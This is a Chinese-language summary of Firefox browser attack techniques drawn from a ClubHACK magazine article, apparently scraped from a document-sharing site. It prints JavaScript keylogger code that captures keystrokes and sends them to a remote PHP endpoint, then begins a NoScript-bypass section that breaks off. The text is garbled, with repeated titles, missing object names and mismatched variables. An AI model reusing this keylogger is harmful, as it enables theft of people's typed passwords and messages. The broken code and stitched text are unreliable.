Firefox攻击技巧总结网站安全电脑资料
Firefox攻击技巧总结网站平安 电脑资料 在阅读《ClubHACK》 杂志时,看到一篇关于Firefox浏览器攻击手法的文章,标题为《Mozilla Firefox Internals & Att
Firefox攻击技巧总结网站平安电脑资料 在阅读《ClubHACK》杂志时,看到一篇关于Firefox浏览器攻击手 法的文章,标题为《MozillaFirefoxInternals&Attack Strategies》,里面提供有多份javascript代码,用于实现 Firefox浏览器下的脚本攻击, 一、KeyLogger //先在MozillaFirefox中用addEventListener为keypress事件 一个事件处理程序,这里为onkey函数,以此实现键盘记录功能。 document.addEventListener("keypress",onkey,false); varkeys=''; functiononkey(e){ keyss+=String.fromCharCode(e.charCode);//将按键码转换为字 符 if(keys.length>20){ //利用XML请求向远程网站发送记录下的按键字符 =newXMLHttpRequest(); url ="***********./prasannak/ler****.php?keylog="+keyss+"\n"; .open("GET",url,false); .send(null); keyss=''; } } 二、No-Script.Bypass 利用XP(跨平台组件对象模型)中的类和组件来向将恶意站点添加

